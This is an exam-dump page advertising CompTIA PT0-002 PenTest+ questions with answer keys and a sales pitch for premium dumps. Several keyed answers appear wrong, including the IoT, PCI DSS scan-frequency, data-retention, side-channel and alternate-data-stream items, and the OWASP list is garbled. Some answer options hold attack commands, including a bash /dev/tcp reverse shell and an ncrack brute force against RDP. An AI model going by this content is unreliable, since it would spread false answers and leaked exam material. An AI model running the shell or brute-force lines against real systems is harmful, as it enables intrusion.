Cause all that matters here is passing the CompTIA PT0-002 exam. Cause all that you need is a high score of PT0-002 CompTIA PenTest+ Certification Exam exam. The only one thing you need to do is downloading Exambible PT0-002 exam study guides now. We will not let you down with our money-back guarantee.

Online CompTIA PT0-002 free dumps demo Below:

Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

  • A. Buffer overflows
  • B. Cross-site scripting
  • C. Race-condition attacks
  • D. Zero-day attacks
  • E. Injection flaws
  • F. Ransomware attacks

Answer: BE


A02-Broken Authentication A03-Sensitive Data Exposure A04-XXE
A05-Broken Access Control A06-Security Misconfiguration A07-XSS
A08-Insecure Deserialization
A09-Using Components with Known Vulnerabilities A10-Insufficient Logging & Monitoring

A penetration tester is attempting to discover live hosts on a subnet quickly. Which of the following commands will perform a ping scan?

  • A. nmap -sn
  • B. nmap -sV -A
  • C. nmap -Pn
  • D. nmap -sT -p-

Answer: A

Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

  • A. Unsupported operating systems
  • B. Susceptibility to DDoS attacks
  • C. Inability to network
  • D. The existence of default passwords

Answer: A

A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.
Which of the following should the tester verify FIRST to assess this risk?

  • A. Whether sensitive client data is publicly accessible
  • B. Whether the connection between the cloud and the client is secure
  • C. Whether the client's employees are trained properly to use the platform
  • D. Whether the cloud applications were developed using a secure SDLC

Answer: A

A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?

  • A. John the Ripper
  • B. Hydra
  • C. Mimikatz
  • D. Cain and Abel

Answer: A

An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client’s information?

  • A. Follow the established data retention and destruction process
  • B. Report any findings to regulatory oversight groups
  • C. Publish the findings after the client reviews the report
  • D. Encrypt and store any client information for future analysis

Answer: D

A penetration tester discovers during a recent test that an employee in the accounting department has been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to prevent this type of activity in the future?

  • A. Enforce mandatory employee vacations
  • B. Implement multifactor authentication
  • C. Install video surveillance equipment in the office
  • D. Encrypt passwords for bank account information

Answer: B

A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

  • A. Open-source research
  • B. A ping sweep
  • C. Traffic sniffing
  • D. Port knocking
  • E. A vulnerability scan
  • F. An Nmap scan

Answer: AC

A penetration tester ran the following command on a staging server:
python –m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?

  • A. nc 9891 < exploit
  • B. powershell –exec bypass –f \\\9891
  • C. bash –i >& /dev/tcp/ 0&1>/exploit
  • D. wget

Answer: D

A penetration tester runs a scan against a server and obtains the following output: 21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-12-20 09:23AM 331 index.aspx
| ftp-syst:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2012 Std 3389/tcp open ssl/ms-wbt-server
| rdp-ntlm-info:
| Target Name: WEB3
| NetBIOS_Computer_Name: WEB3
| Product_Version: 6.3.9600
|_ System_Time: 2021-01-15T11:32:06+00:00
8443/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
Which of the following command sequences should the penetration tester try NEXT?

  • A. ftp
  • B. smbclient \\\\WEB3\\IPC$ -I –U guest
  • C. ncrack –u Administrator –P 15worst_passwords.txt –p rdp
  • D. curl –X TRACE
  • E. nmap –-script vuln –sV

Answer: A

A penetration tester ran the following commands on a Windows server:
PT0-002 dumps exhibit
Which of the following should the tester do AFTER delivering the final report?

  • A. Delete the scheduled batch job.
  • B. Close the reverse shell connection.
  • C. Downgrade the svsaccount permissions.
  • D. Remove the tester-created credentials.

Answer: D

Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

  • A. chmod u+x
  • B. chmod u+e
  • C. chmod o+e
  • D. chmod o+x

Answer: A

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?

  • A. <#
  • B. <$
  • C. ##
  • D. #$
  • E. #!

Answer: E

A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?

  • A. Weekly
  • B. Monthly
  • C. Quarterly
  • D. Annually

Answer: A

A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

  • A. Alternate data streams
  • B. PowerShell modules
  • C. MP4 steganography
  • D. PsExec

Answer: D

You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious. INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
PT0-002 dumps exhibit

* 1. Reflected XSS - Input sanitization (<> ...)
* 2. Sql Injection Stacked - Parameterized Queries
* 3. DOM XSS - Input Sanitization (<> ...)
* 4. Local File Inclusion - sandbox req
* 5. Command Injection - sandbox req
* 6. SQLi union - paramtrized queries
* 7. SQLi error - paramtrized queries
* 8. Remote File Inclusion - sandbox
* 9. Command Injection - input saniti $
* 10. URL redirect - prevent external calls

Does this meet the goal?
  • A. Yes
  • B. Not Mastered

Answer: A

A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.
Which of the following describes the scope of the assessment?

  • A. Partially known environment testing
  • B. Known environment testing
  • C. Unknown environment testing
  • D. Physical environment testing

Answer: C

A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client’s IP address. The tester later discovered the SOC had used sinkholing on the penetration tester’s IP address. Which of the following BEST describes what happened?

  • A. The penetration tester was testing the wrong assets
  • B. The planning process failed to ensure all teams were notified
  • C. The client was not ready for the assessment to start
  • D. The penetration tester had incorrect contact information

Answer: B

A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?

  • A. Data flooding
  • B. Session riding
  • C. Cybersquatting
  • D. Side channel

Answer: B

A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

  • A. Wait for the next login and perform a downgrade attack on the server.
  • B. Capture traffic using Wireshark.
  • C. Perform a brute-force attack over the server.
  • D. Use an FTP exploit against the server.

Answer: B


Thanks for reading the newest PT0-002 exam dumps! We recommend you to try the PREMIUM PT0-002 dumps in VCE and PDF here: (110 Q&As Dumps)